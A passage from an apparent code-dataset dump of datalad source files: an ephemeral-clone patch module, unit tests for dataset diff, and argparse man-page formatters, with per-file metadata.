through a set\n# of typical scenarios\nclass gitrepo(SampleSuperDatasetBenchmarks):\n\n def time_get_content_info(self):\n info = self.repo.get_content_info()\n assert isinstance(info, dict) # just so we do not end up with a generator\n" }, { "alpha_fraction": 0.6121391654014587, "alphanum_fraction": 0.6128793358802795, "avg_line_length": 37.32624053955078, "blob_id": "fbb9a93d197cbe8d14d266300be3b6d4971391c1", "content_id": "1c133827540e8eeb46f4556ab6e6c192e0578f17", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5404, "license_type": "permissive", "max_line_length": 79, "num_lines": 141, "path": "/datalad/core/distributed/clone_ephemeral.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import RI\nfrom datalad.utils import (\n Path,\n check_symlink_capability,\n rmtree,\n)\n\nfrom . import clone as mod_clone\n\n# we need to preserve the original functions to be able to call them\n# in the patch\norig_pre_annex_init_processing_ = mod_clone._pre_annex_init_processing_\norig_post_annex_init_processing_ = mod_clone._post_annex_init_processing_\n\nlgr = logging.getLogger('datalad.core.distributed.clone')\n\n\ndef _pre_annex_init_processing_(\n *,\n destds: Dataset,\n reckless: None or str,\n **kwargs\n):\n if reckless == 'ephemeral':\n # In ephemeral clones we set annex.private=true. This would prevent the\n # location itself being recorded in uuid.log. With a private repo,\n # declaring dead (see below after annex-init) seems somewhat\n # superfluous, but on the other hand:\n # If an older annex that doesn't support private yet touches the\n # repo, the entire purpose of ephemeral would be sabotaged if we did\n # not declare dead in addition. Hence, keep it regardless of annex\n # version.\n destds.config.set('annex.private', 'true', scope='local')\n\n yield from orig_pre_annex_init_processing_(\n destds=destds, reckless=reckless, **kwargs)\n\n\ndef _post_annex_init_processing_(\n *,\n destds: Dataset,\n remote: str,\n reckless: None or str,\n **kwargs\n):\n\n if reckless == 'ephemeral':\n _setup_ephemeral_annex(destds, remote)\n\n yield from orig_post_annex_init_processing_(\n destds=destds, remote=remote, reckless=reckless,\n **kwargs)\n\n\ndef _setup_ephemeral_annex(ds: Dataset, remote: str):\n # with ephemeral we declare 'here' as 'dead' right away, whenever\n # we symlink the remote's annex, since availability from 'here' should\n # not be propagated for an ephemeral clone when we publish back to\n # the remote.\n # This will cause stuff like this for a locally present annexed file:\n # % git annex whereis d1\n # whereis d1 (0 copies) failed\n # BUT this works:\n # % git annex find . --not --in here\n # % git annex find . --in here\n # d1\n\n # we don't want annex copy-to <remote>\n ds.config.set(\n f'remote.{remote}.annex-ignore', 'true',\n scope='local')\n ds.repo.set_remote_dead('here')\n\n if check_symlink_capability(ds.repo.dot_git / 'dl_link_test',\n ds.repo.dot_git / 'dl_target_test'):\n # symlink the annex to avoid needless copies in an ephemeral clone\n annex_dir = ds.repo.dot_git / 'annex'\n origin_annex_url = ds.config.get(f\"remote.{remote}.url\", None)\n origin_git_path = None\n if origin_annex_url:\n try:\n # Deal with file:// scheme URLs as well as plain paths.\n # If origin isn't local, we have nothing to do.\n origin_git_path = Path(RI(origin_annex_url).localpath)\n\n if not origin_git_path.is_absolute():\n # relative path would be relative to the ds, not pwd!\n origin_git_path = ds.pathobj / origin_git_path\n\n # we are local; check for a bare repo first to not mess w/\n # the path\n if GitRepo(origin_git_path, create=False).bare:\n # origin is a bare repo -> use path as is\n pass\n elif origin_git_path.name != '.git':\n origin_git_path /= '.git'\n except ValueError as e:\n CapturedException(e)\n # Note, that accessing localpath on a non-local RI throws\n # ValueError rather than resulting in an AttributeError.\n # TODO: Warning level okay or is info level sufficient?\n # Note, that setting annex-dead is independent of\n # symlinking .git/annex. It might still make sense to\n # have an ephemeral clone that doesn't propagate its avail.\n # info. Therefore don't fail altogether.\n lgr.warning(\"reckless=ephemeral mode: %s doesn't seem \"\n \"local: %s\\nno symlinks being used\",\n remote, origin_annex_url)\n if origin_git_path:\n # TODO make sure that we do not delete any unique data\n rmtree(str(annex_dir)) \\\n if not annex_dir.is_symlink() else annex_dir.unlink()\n annex_dir.symlink_to(origin_git_path / 'annex',\n target_is_directory=True)\n else:\n # TODO: What level? + note, that annex-dead is independent\n lgr.warning(\"reckless=ephemeral mode: Unable to create symlinks on \"\n \"this file system.\")\n\n\ndef _apply():\n # apply patch in a function, to be able to easily patch it out\n # and turn off the patch\n lgr.debug(\n 'Apply ephemeral patch to clone.py:_pre_annex_init_processing_')\n mod_clone._pre_annex_init_processing_ = _pre_annex_init_processing_\n lgr.debug(\n 'Apply ephemeral patch to clone.py:_post_annex_init_processing_')\n mod_clone._post_annex_init_processing_ = _post_annex_init_processing_\n\n\n_apply()\n" }, { "alpha_fraction": 0.6013655662536621, "alphanum_fraction": 0.6104373335838318, "avg_line_length": 37.288848876953125, "blob_id": "1b27808031dc103966f74f31dbd297e7f6c0f104", "content_id": "6e20d54863d531dabf8749d04fdc30cfc03e77b2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20945, "license_type": "permissive", "max_line_length": 102, "num_lines": 547, "path": "/datalad/core/local/tests/test_diff.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"test dataset diff\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport os\nimport os.path as op\nfrom unittest.mock import patch\n\nimport datalad.utils as ut\nfrom datalad.api import (\n create,\n diff,\n save,\n)\nfrom datalad.cmd import (\n GitWitlessRunner,\n StdOutCapture,\n)\nfrom datalad.consts import PRE_INIT_COMMIT_SHA\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import NoDatasetFound\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n OBSCURE_FILENAME,\n SkipTest,\n assert_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n chpwd,\n create_tree,\n eq_,\n get_deeply_nested_structure,\n has_symlink_capability,\n known_failure_githubci_win,\n neq_,\n ok_,\n with_tempfile,\n)\nfrom datalad.utils import Path\n\n\ndef test_magic_number():\n # we hard code the magic SHA1 that represents the state of a Git repo\n # prior to the first commit -- used to diff from scratch to a specific\n # commit\n # given the level of dark magic, we better test whether this stays\n # constant across Git versions (it should!)\n out = GitWitlessRunner().run(\n 'cd ./ | git hash-object --stdin -t tree',\n protocol=StdOutCapture)\n eq_(out['stdout'].strip(), PRE_INIT_COMMIT_SHA)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_repo_diff(path=None, norepo=None):\n ds = Dataset(path).create()\n assert_repo_status(ds.path)\n assert_raises(ValueError, ds.repo.diff, fr='WTF', to='MIKE')\n\n if ds.repo.is_managed_branch():\n fr_base = DEFAULT_BRANCH\n to = DEFAULT_BRANCH\n else:\n fr_base = \"HEAD\"\n to = None\n\n # no diff\n eq_(ds.repo.diff(fr_base, to), {})\n # bogus path makes no difference\n eq_(ds.repo.diff(fr_base, to, paths=['THIS']), {})\n # let's introduce a known change\n create_tree(ds.path, {'new': 'empty'})\n ds.save(to_git=True)\n assert_repo_status(ds.path)\n eq_(ds.repo.diff(fr=fr_base + '~1', to=fr_base),\n {ut.Path(ds.repo.pathobj / 'new'): {\n 'state': 'added',\n 'type': 'file',\n 'bytesize': 5,\n 'gitshasum': '7b4d68d70fcae134d5348f5e118f5e9c9d3f05f6'}})\n # modify known file\n create_tree(ds.path, {'new': 'notempty'})\n eq_(ds.repo.diff(fr='HEAD', to=None),\n {ut.Path(ds.repo.pathobj / 'new'): {\n 'state': 'modified',\n 'type': 'file',\n # the beast is modified, but no change in shasum -> not staged\n 'gitshasum': '7b4d68d70fcae134d5348f5e118f5e9c9d3f05f6',\n 'prev_gitshasum': '7b4d68d70fcae134d5348f5e118f5e9c9d3f05f6'}})\n # per path query gives the same result\n eq_(ds.repo.diff(fr=fr_base, to=to),\n ds.repo.diff(fr=fr_base, to=to, paths=['new']))\n # also given a directory as a constraint does the same\n eq_(ds.repo.diff(fr=fr_base, to=to),\n ds.repo.diff(fr=fr_base, to=to, paths=['.']))\n # but if we give another path, it doesn't show up\n eq_(ds.repo.diff(fr=fr_base, to=to, paths=['other']), {})\n\n # make clean\n ds.save()\n assert_repo_status(ds.path)\n\n # untracked stuff\n create_tree(ds.path, {'deep': {'down': 'untracked', 'down2': 'tobeadded'}})\n # default is to report all files\n eq_(ds.repo.diff(fr='HEAD', to=None),\n {\n ut.Path(ds.repo.pathobj / 'deep' / 'down'): {\n 'state': 'untracked',\n 'type': 'file'},\n ut.Path(ds.repo.pathobj / 'deep' / 'down2'): {\n 'state': 'untracked',\n 'type': 'file'}})\n # but can be made more compact\n eq_(ds.repo.diff(fr='HEAD', to=None, untracked='normal'),\n {\n ut.Path(ds.repo.pathobj / 'deep'): {\n 'state': 'untracked',\n 'type': 'directory'}})\n\n # again a unmatching path constrained will give an empty report\n eq_(ds.repo.diff(fr='HEAD', to=None, paths=['other']), {})\n # perfect match and anything underneath will do\n eq_(ds.repo.diff(fr='HEAD', to=None, paths=['deep']),\n {\n ut.Path(ds.repo.pathobj / 'deep' / 'down'): {\n 'state': 'untracked',\n 'type': 'file'},\n ut.Path(ds.repo.pathobj / 'deep' / 'down2'): {\n 'state': 'untracked',\n 'type': 'file'}})\n\n\ndef _dirty_results(res):\n return [r for r in res if r.get('state', None) != 'clean']\n\n\n# this is an extended variant of `test_repo_diff()` above\n# that focuses on the high-level command API\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_diff(path=None, norepo=None):\n with chpwd(norepo):\n assert_raises(NoDatasetFound, diff)\n ds = Dataset(path).create()\n assert_repo_status(ds.path)\n # reports stupid revision input\n assert_result_count(\n ds.diff(fr='WTF', on_failure='ignore', result_renderer='disabled'),\n 1,\n status='impossible',\n message=\"Git reference 'WTF' invalid\")\n # no diff\n assert_result_count(_dirty_results(ds.diff(result_renderer='disabled')), 0)\n assert_result_count(\n _dirty_results(ds.diff(fr='HEAD', result_renderer='disabled')), 0)\n # bogus path makes no difference\n assert_result_count(\n _dirty_results(ds.diff(path='THIS', fr='HEAD', result_renderer='disabled')),\n 0)\n # let's introduce a known change\n create_tree(ds.path, {'new': 'empty'})\n ds.save(to_git=True)\n assert_repo_status(ds.path)\n\n if ds.repo.is_managed_branch():\n fr_base = DEFAULT_BRANCH\n to = DEFAULT_BRANCH\n else:\n fr_base = \"HEAD\"\n to = None\n\n res = _dirty_results(ds.diff(fr=fr_base + '~1', to=to, result_renderer='disabled'))\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, action='diff', path=op.join(ds.path, 'new'), state='added')\n # we can also find the diff without going through the dataset explicitly\n with chpwd(ds.path):\n assert_result_count(\n _dirty_results(diff(fr=fr_base + '~1', to=to,\n result_renderer='disabled')),\n 1,\n action='diff', path=op.join(ds.path, 'new'), state='added')\n # no diff against HEAD\n assert_result_count(_dirty_results(ds.diff(result_renderer='disabled')), 0)\n # modify known file\n create_tree(ds.path, {'new': 'notempty'})\n res = _dirty_results(ds.diff(result_renderer='disabled'))\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, action='diff', path=op.join(ds.path, 'new'),\n state='modified')\n # but if we give another path, it doesn't show up\n assert_result_count(ds.diff(path='otherpath', result_renderer='disabled'), 0)\n # giving the right path must work though\n assert_result_count(\n ds.diff(path='new', result_renderer='disabled'), 1,\n action='diff', path=op.join(ds.path, 'new'), state='modified')\n # stage changes\n ds.repo.add('.', git=True)\n # no change in diff, staged is not committed\n assert_result_count(_dirty_results(ds.diff(result_renderer='disabled')), 1)\n ds.save()\n assert_repo_status(ds.path)\n assert_result_count(_dirty_results(ds.diff(result_renderer='disabled')), 0)\n\n # untracked stuff\n create_tree(ds.path, {'deep': {'down': 'untracked', 'down2': 'tobeadded'}})\n # a plain diff should report the untracked file\n # but not directly, because the parent dir is already unknown\n res = _dirty_results(ds.diff(result_renderer='disabled'))\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, state='untracked', type='directory',\n path=op.join(ds.path, 'deep'))\n # report of individual files is also possible\n assert_result_count(\n ds.diff(untracked='all', result_renderer='disabled'), 2, state='untracked',\n type='file')\n # an unmatching path will hide this result\n assert_result_count(ds.diff(path='somewhere', result_renderer='disabled'), 0)\n # perfect match and anything underneath will do\n assert_result_count(\n ds.diff(path='deep', result_renderer='disabled'), 1, state='untracked',\n path=op.join(ds.path, 'deep'),\n type='directory')\n assert_result_count(\n ds.diff(path='deep', result_renderer='disabled'), 1,\n state='untracked', path=op.join(ds.path, 'deep'))\n ds.repo.add(op.join('deep', 'down2'), git=True)\n # now the remaining file is the only untracked one\n assert_result_count(\n ds.diff(result_renderer='disabled'), 1, state='untracked',\n path=op.join(ds.path, 'deep', 'down'),\n type='file')\n\n\n@with_tempfile(mkdir=True)\ndef test_diff_recursive(path=None):\n ds = Dataset(path).create()\n sub = ds.create('sub')\n # look at the last change, and confirm a dataset was added\n res = ds.diff(fr=DEFAULT_BRANCH + '~1', to=DEFAULT_BRANCH,\n result_renderer='disabled')\n assert_result_count(\n res, 1, action='diff', state='added', path=sub.path, type='dataset')\n # now recursive\n res = ds.diff(recursive=True, fr=DEFAULT_BRANCH + '~1', to=DEFAULT_BRANCH,\n result_renderer='disabled')\n # we also get the entire diff of the subdataset from scratch\n assert_status('ok', res)\n ok_(len(res) > 3)\n # one specific test\n assert_result_count(\n res, 1, action='diff', state='added',\n path=op.join(sub.path, '.datalad', 'config'))\n\n # now we add a file to just the parent\n create_tree(\n ds.path,\n {'onefile': 'tobeadded', 'sub': {'twofile': 'tobeadded'}})\n res = ds.diff(recursive=True, untracked='all', result_renderer='disabled')\n assert_result_count(_dirty_results(res), 3)\n assert_result_count(\n res, 1,\n action='diff', state='untracked', path=op.join(ds.path, 'onefile'),\n type='file')\n assert_result_count(\n res, 1,\n action='diff', state='modified', path=sub.path, type='dataset')\n assert_result_count(\n res, 1,\n action='diff', state='untracked', path=op.join(sub.path, 'twofile'),\n type='file')\n # intentional save in two steps to make check below easier\n ds.save('sub', recursive=True)\n ds.save()\n assert_repo_status(ds.path)\n\n head_ref = DEFAULT_BRANCH if ds.repo.is_managed_branch() else 'HEAD'\n\n # look at the last change, only one file was added\n res = ds.diff(fr=head_ref + '~1', to=head_ref, annex='basic',\n result_renderer='disabled')\n assert_result_count(_dirty_results(res), 1)\n assert_result_count(\n res, 1,\n action='diff', state='added', path=op.join(ds.path, 'onefile'),\n type='file')\n\n # now the exact same thing with recursion, must not be different from the\n # call above\n res = ds.diff(recursive=True, fr=head_ref + '~1', to=head_ref,\n annex='basic', result_renderer='disabled')\n assert_result_count(_dirty_results(res), 1)\n # last change in parent\n assert_result_count(\n res, 1, action='diff', state='added', path=op.join(ds.path, 'onefile'),\n type='file')\n\n if ds.repo.is_managed_branch():\n raise SkipTest(\n \"Test assumption broken: https://github.com/datalad/datalad/issues/3818\")\n # one further back brings in the modified subdataset, and the added file\n # within it\n res = ds.diff(recursive=True, fr=head_ref + '~2', to=head_ref,\n annex='basic', result_renderer='disabled')\n assert_result_count(_dirty_results(res), 3)\n assert_result_count(\n res, 1,\n action='diff', state='added', path=op.join(ds.path, 'onefile'),\n type='file')\n assert_result_count(\n res, 1,\n action='diff', state='added', path=op.join(sub.path, 'twofile'),\n type='file')\n assert_result_count(\n res, 1,\n action='diff', state='modified', path=sub.path, type='dataset')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\ndef test_path_diff(_path=None, linkpath=None):\n # do the setup on the real path, not the symlink, to have its\n # bugs not affect this test of status()\n ds = get_deeply_nested_structure(str(_path))\n if has_symlink_capability():\n # make it more complicated by default\n ut.Path(linkpath).symlink_to(_path, target_is_directory=True)\n path = linkpath\n else:\n path = _path\n\n ds = Dataset(path)\n if has_symlink_capability():\n assert ds.pathobj != ds.repo.pathobj\n\n plain_recursive = ds.diff(recursive=True, annex='all', result_renderer='disabled')\n # check integrity of individual reports with a focus on how symlinks\n # are reported\n for res in plain_recursive:\n # anything that is an \"intended\" symlink should be reported\n # as such. In contrast, anything that is a symlink for mere\n # technical reasons (annex using it for something in some mode)\n # should be reported as the thing it is representing (i.e.\n # a file)\n if 'link2' in str(res['path']):\n assert res['type'] == 'symlink', res\n else:\n assert res['type'] != 'symlink', res\n # every item must report its parent dataset\n assert_in('parentds', res)\n\n # bunch of smoke tests\n # query of '.' is same as no path\n eq_(plain_recursive, ds.diff(path='.', recursive=True, annex='all',\n result_renderer='disabled'))\n # duplicate paths do not change things\n eq_(plain_recursive, ds.diff(path=['.', '.'], recursive=True, annex='all',\n result_renderer='disabled'))\n # neither do nested paths\n if not \"2.24.0\" <= ds.repo.git_version < \"2.25.0\":\n # Release 2.24.0 contained a regression that was fixed with 072a231016\n # (2019-12-10).\n eq_(plain_recursive,\n ds.diff(path=['.', 'subds_modified'], recursive=True, annex='all',\n result_renderer='disabled'))\n # when invoked in a subdir of a dataset it still reports on the full thing\n # just like `git status`, as long as there are no paths specified\n with chpwd(op.join(path, 'directory_untracked')):\n plain_recursive = diff(recursive=True, annex='all',\n result_renderer='disabled')\n # should be able to take absolute paths and yield the same\n # output\n eq_(plain_recursive, ds.diff(path=ds.path, recursive=True, annex='all',\n result_renderer='disabled'))\n\n # query for a deeply nested path from the top, should just work with a\n # variety of approaches\n rpath = op.join('subds_modified', 'subds_lvl1_modified',\n u'{}_directory_untracked'.format(OBSCURE_FILENAME))\n apathobj = ds.pathobj / rpath\n apath = str(apathobj)\n for p in (rpath, apath, None):\n if p is None:\n # change into the realpath of the dataset and\n # query with an explicit path\n with chpwd(ds.path):\n res = ds.diff(\n path=op.join('.', rpath),\n recursive=True,\n annex='all', result_renderer='disabled')\n else:\n res = ds.diff(\n path=p,\n recursive=True,\n annex='all', result_renderer='disabled')\n assert_result_count(\n res,\n 1,\n state='untracked',\n type='directory',\n refds=ds.path,\n # path always comes out a full path inside the queried dataset\n path=apath,\n )\n\n assert_result_count(\n ds.diff(\n recursive=True, result_renderer='disabled'),\n 1,\n path=apath)\n # limiting recursion will exclude this particular path\n assert_result_count(\n ds.diff(\n recursive=True,\n recursion_limit=1, result_renderer='disabled'),\n 0,\n path=apath)\n # negative limit is unlimited limit\n eq_(\n ds.diff(recursive=True, recursion_limit=-1, result_renderer='disabled'),\n ds.diff(recursive=True, result_renderer='disabled')\n )\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_diff_nods(path=None, otherpath=None):\n ds = Dataset(path).create()\n assert_result_count(\n ds.diff(path=otherpath, on_failure='ignore', result_renderer='disabled'),\n 1,\n status='error',\n message='path not underneath this dataset')\n otherds = Dataset(otherpath).create()\n assert_result_count(\n ds.diff(path=otherpath, on_failure='ignore', result_renderer='disabled'),\n 1,\n path=otherds.path,\n status='error',\n message=(\n 'dataset containing given paths is not underneath the '\n 'reference dataset %s: %s', ds, otherds.path)\n )\n\n\n@with_tempfile(mkdir=True)\ndef test_diff_rsync_syntax(path=None):\n # three nested datasets\n ds = Dataset(path).create()\n subds = ds.create('sub')\n subsubds = subds.create(Path('subdir', 'deep'))\n justtop = ds.diff(fr=PRE_INIT_COMMIT_SHA, path='sub', result_renderer='disabled')\n # we only get a single result, the subdataset in question\n assert_result_count(justtop, 1)\n assert_result_count(justtop, 1, type='dataset', path=subds.path)\n # now with \"peak inside the dataset\" syntax\n inside = ds.diff(fr=PRE_INIT_COMMIT_SHA, path='sub' + os.sep,\n result_renderer='disabled')\n # we get both subdatasets, but nothing else inside the nested one\n assert_result_count(inside, 2, type='dataset')\n assert_result_count(inside, 1, type='dataset', path=subds.path)\n assert_result_count(inside, 1, type='dataset', path=subsubds.path)\n assert_result_count(inside, 0, type='file', parentds=subsubds.path)\n # if we point to the subdir in 'sub' the reporting wrt the subsubds\n # doesn't change. It is merely a path constraint within the queried\n # subds, but because the subsubds is still underneath it, nothing changes\n inside_subdir = ds.diff(\n fr=PRE_INIT_COMMIT_SHA, path=op.join('sub', 'subdir'),\n result_renderer='disabled')\n assert_result_count(inside_subdir, 2, type='dataset')\n assert_result_count(inside_subdir, 1, type='dataset', path=subds.path)\n assert_result_count(inside_subdir, 1, type='dataset', path=subsubds.path)\n assert_result_count(inside_subdir, 0, type='file', parentds=subsubds.path)\n # but the rest is different (e.g. all the stuff in .datalad is gone)\n neq_(inside, inside_subdir)\n # just for completeness, we get more when going full recursive\n rec = ds.diff(fr=PRE_INIT_COMMIT_SHA, recursive=True, path='sub' + os.sep,\n result_renderer='disabled')\n assert(len(inside) < len(rec))\n\n\n@with_tempfile(mkdir=True)\ndef test_diff_nonexistent_ref_unicode(path=None):\n ds = Dataset(path).create()\n assert_result_count(\n ds.diff(fr=\"HEAD\", to=u\"β\", on_failure=\"ignore\", result_renderer='disabled'),\n 1,\n path=ds.path,\n status=\"impossible\")\n\n\n# https://github.com/datalad/datalad/issues/3997\n@with_tempfile(mkdir=True)\ndef test_no_worktree_impact_false_deletions(path=None):\n ds = Dataset(path).create()\n # create a branch that has no new content\n ds.repo.call_git(['checkout', '-b', 'test'])\n # place two successive commits with file additions into the default branch\n ds.repo.call_git(['checkout', DEFAULT_BRANCH])\n (ds.pathobj / 'identical').write_text('should be')\n ds.save()\n (ds.pathobj / 'new').write_text('yes')\n ds.save()\n # now perform a diff for the last commit, there is one file that remained\n # identifical\n ds.repo.call_git(['checkout', 'test'])\n res = ds.diff(fr=DEFAULT_BRANCH + '~1', to=DEFAULT_BRANCH,\n result_renderer='disabled')\n # under no circumstances can there be any reports on deleted files\n # because we never deleted anything\n assert_result_count(res, 0, state='deleted')\n # the identical file must be reported clean\n assert_result_count(\n res,\n 1,\n state='clean',\n path=str(ds.pathobj / 'identical'),\n )\n\n\n@with_tempfile(mkdir=True)\ndef test_diff_fr_none_one_get_content_annexinfo_call(path=None):\n from datalad.support.annexrepo import AnnexRepo\n ds = Dataset(path).create()\n (ds.pathobj / \"foo\").write_text(\"foo\")\n ds.save()\n # get_content_annexinfo() is expensive. If fr=None, we should\n # only need to call it once.\n with patch.object(AnnexRepo, \"get_content_annexinfo\") as gca:\n res = ds.diff(fr=None, to=\"HEAD\", annex=\"all\", result_renderer='disabled')\n eq_(gca.call_count, 1)\n" }, { "alpha_fraction": 0.5215922594070435, "alphanum_fraction": 0.5270702242851257, "avg_line_length": 33.12149429321289, "blob_id": "0362fb8fdf1f1e06be1b079aba753111edcac235", "content_id": "04248a33f14db3b3a39e108d4138dccaadb7eefe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10953, "license_type": "permissive", "max_line_length": 91, "num_lines": 321, "path": "/_datalad_build_support/formatters.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport argparse\nimport datetime\nimport os\nimport re\nimport time\nfrom textwrap import wrap\n\n\nclass ManPageFormatter(argparse.HelpFormatter):\n # This code was originally distributed\n # under the same License of Python\n # Copyright (c) 2014 Oz Nahum Tiram <[email protected]>\n def __init__(self,\n prog,\n indent_increment=2,\n max_help_position=4,\n width=1000000,\n section=1,\n ext_sections=None,\n authors=None,\n version=None\n ):\n from datalad import cfg\n super(ManPageFormatter, self).__init__(\n prog,\n indent_increment=indent_increment,\n max_help_position=max_help_position,\n width=width)\n\n self._prog = prog\n self._section = 1\n self._today = datetime.datetime.utcfromtimestamp(\n cfg.obtain('datalad.source.epoch')\n ).strftime('%Y\\\\-%m\\\\-%d')\n self._ext_sections = ext_sections\n self._version = version\n\n def _get_formatter(self, **kwargs):\n return self.formatter_class(prog=self.prog, **kwargs)\n\n def _markup(self, txt):\n return txt.replace('-', '\\\\-')\n\n def _underline(self, string):\n return \"\\\\fI\\\\s-1\" + string + \"\\\\s0\\\\fR\"\n\n def _bold(self, string):\n if not string.strip().startswith('\\\\fB'):\n string = '\\\\fB' + string\n if not string.strip().endswith('\\\\fR'):\n string = string + '\\\\fR'\n return string\n\n def _mk_synopsis(self, parser):\n self.add_usage(parser.usage, parser._actions,\n parser._mutually_exclusive_groups, prefix='')\n usage = self._format_usage(None, parser._actions,\n parser._mutually_exclusive_groups, '')\n # replace too long list of commands with a single placeholder\n usage = re.sub(r'{[^]]*?create,.*?}', ' COMMAND ', usage, flags=re.MULTILINE)\n # take care of proper wrapping\n usage = re.sub(r'\\[([-a-zA-Z0-9]*)\\s([a-zA-Z0-9{}|_]*)\\]', r'[\\1\\~\\2]', usage)\n\n usage = usage.replace('%s ' % self._prog, '')\n usage = '.SH SYNOPSIS\\n.nh\\n.HP\\n\\\\fB%s\\\\fR %s\\n.hy\\n' % (self._markup(self._prog),\n usage)\n return usage\n\n def _mk_title(self, prog):\n name_version = \"{0} {1}\".format(prog, self._version)\n return '.TH \"{0}\" \"{1}\" \"{2}\" \"{3}\"\\n'.format(\n prog, self._section, self._today, name_version)\n\n def _mk_name(self, prog, desc):\n \"\"\"\n this method is in consistent with others ... it relies on\n distribution\n \"\"\"\n desc = desc.splitlines()[0] if desc else 'it is in the name'\n # ensure starting lower case\n desc = desc[0].lower() + desc[1:]\n return '.SH NAME\\n%s \\\\- %s\\n' % (self._bold(prog), desc)\n\n def _mk_description(self, parser):\n desc = parser.description\n desc = '\\n'.join(desc.splitlines()[1:])\n if not desc:\n return ''\n desc = desc.replace('\\n\\n', '\\n.PP\\n')\n # sub-section headings\n desc = re.sub(r'^\\*(.*)\\*$', r'.SS \\1', desc, flags=re.MULTILINE)\n # italic commands\n desc = re.sub(r'^ ([-a-z]*)$', r'.TP\\n\\\\fI\\1\\\\fR', desc, flags=re.MULTILINE)\n # deindent body text, leave to troff viewer\n desc = re.sub(r'^ (\\S.*)\\n', '\\\\1\\n', desc, flags=re.MULTILINE)\n # format NOTEs as indented paragraphs\n desc = re.sub(r'^NOTE\\n', '.TP\\nNOTE\\n', desc, flags=re.MULTILINE)\n # deindent indented paragraphs after heading setup\n desc = re.sub(r'^ (.*)$', '\\\\1', desc, flags=re.MULTILINE)\n\n return '.SH DESCRIPTION\\n%s\\n' % self._markup(desc)\n\n def _mk_footer(self, sections):\n if not hasattr(sections, '__iter__'):\n return ''\n\n footer = []\n for section, value in sections.items():\n part = \".SH {}\\n {}\".format(section.upper(), value)\n footer.append(part)\n\n return '\\n'.join(footer)\n\n def format_man_page(self, parser):\n page = []\n page.append(self._mk_title(self._prog))\n page.append(self._mk_name(self._prog, parser.description))\n page.append(self._mk_synopsis(parser))\n page.append(self._mk_description(parser))\n page.append(self._mk_options(parser))\n page.append(self._mk_footer(self._ext_sections))\n\n return ''.join(page)\n\n def _mk_options(self, parser):\n\n formatter = parser._get_formatter()\n\n # positionals, optionals and user-defined groups\n for action_group in parser._action_groups:\n formatter.start_section(None)\n formatter.add_text(None)\n formatter.add_arguments(action_group._group_actions)\n formatter.end_section()\n\n # epilog\n formatter.add_text(parser.epilog)\n\n # determine help from format above\n help = formatter.format_help()\n # add spaces after comma delimiters for easier reformatting\n help = re.sub(r'([a-z]),([a-z])', '\\\\1, \\\\2', help)\n # get proper indentation for argument items\n help = re.sub(r'^ (\\S.*)\\n', '.TP\\n\\\\1\\n', help, flags=re.MULTILINE)\n # deindent body text, leave to troff viewer\n help = re.sub(r'^ (\\S.*)\\n', '\\\\1\\n', help, flags=re.MULTILINE)\n return '.SH OPTIONS\\n' + help\n\n def _format_action_invocation(self, action, doubledash='--'):\n if not action.option_strings:\n metavar, = self._metavar_formatter(action, action.dest)(1)\n return metavar\n\n else:\n parts = []\n\n # if the Optional doesn't take a value, format is:\n # -s, --long\n if action.nargs == 0:\n parts.extend([self._bold(action_str) for action_str in\n action.option_strings])\n\n # if the Optional takes a value, format is:\n # -s ARGS, --long ARGS\n else:\n default = self._underline(action.dest.upper())\n args_string = self._format_args(action, default)\n for option_string in action.option_strings:\n parts.append('%s %s' % (self._bold(option_string),\n args_string))\n\n return ', '.join(p.replace('--', doubledash) for p in parts)\n\n\nclass RSTManPageFormatter(ManPageFormatter):\n def _get_formatter(self, **kwargs):\n return self.formatter_class(prog=self.prog, **kwargs)\n\n def _markup(self, txt):\n # put general tune-ups here\n return txt\n\n def _underline(self, string):\n return \"*{0}*\".format(string)\n\n def _bold(self, string):\n return \"**{0}**\".format(string)\n\n def _mk_synopsis(self, parser):\n self.add_usage(parser.usage, parser._actions,\n parser._mutually_exclusive_groups, prefix='')\n usage = self._format_usage(None, parser._actions,\n parser._mutually_exclusive_groups, '')\n\n usage = usage.replace('%s ' % self._prog, '')\n usage = '\\n'.join(wrap(\n usage, break_on_hyphens=False, subsequent_indent=6*' '))\n usage = 'Synopsis\\n--------\\n::\\n\\n %s %s\\n\\n' \\\n % (self._markup(self._prog), usage)\n return usage\n\n def _mk_title(self, prog):\n # and an easy to use reference point\n title = \".. _man_%s:\\n\\n\" % prog.replace(' ', '-')\n title += \"{0}\".format(prog)\n title += '\\n{0}\\n\\n'.format('=' * len(prog))\n return title\n\n def _mk_name(self, prog, desc):\n return ''\n\n def 